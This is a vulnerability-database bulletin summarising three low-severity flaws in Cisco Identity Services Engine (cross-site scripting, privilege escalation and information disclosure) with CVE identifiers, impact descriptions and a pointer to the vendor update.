SB2019012408 - Multiple vulnerabilities in Cisco Identity Services Engine

CSH
CYBERSECURITY HELP
Sign In REGISTER

Main Vulnerability Database SB2019012408

SB2019012408 - Multiple vulnerabilities in Cisco Identity Services Engine

Published: January 24, 2019

Security Bulletin ID SB2019012408
Severity
Low
Patch available
YES
Number of vulnerabilities 3
Exploitation vector Remote access
Highest impact Data manipulation

Breakdown by Severity

Low 100%
  • Low
  • Medium
  • High
  • Critical

Description

This security bulletin contains information about 3 secuirty vulnerabilities.


1) Cross-site scripting (CVE-ID: CVE-2018-15455)

The disclosed vulnerability allows a remote attacker to perform cross-site scripting (XSS) attacks.

The vulnerability exists due to insufficient sanitization of user-supplied data. A remote attacker can trick the victim to follow a specially crafted link and execute arbitrary HTML and script code in user's browser in context of vulnerable website.

Successful exploitation of this vulnerability may allow a remote attacker to steal potentially sensitive information, change appearance of the web page, perform phishing and drive-by-download attacks.


2) Privilege escalation (CVE-ID: CVE-2018-15459)

The vulnerability allows a remote authenticated attacker to gain elevated privileges.

The vulnerability exists due to improper controls on certain pages in the web interface. A remote attacker can authenticate to the device with an administrator account and sending a crafted HTTP request, create additional Admin accounts with different user roles and then use these accounts to perform actions within their scope.


3) Information disclosure (CVE-ID: CVE-2018-0187)

The vulnerability allows a remote authenticated attacker to obtain potentially sensitive information.

The vulnerability exists in the Admin portal due to improper handling of confidential information. A remote attacker can log into the web interface and obtain confidential information for privileged accounts that can then be used to impersonate or negatively impact the privileged account on the affected system.


Remediation

Install update from vendor's website.

References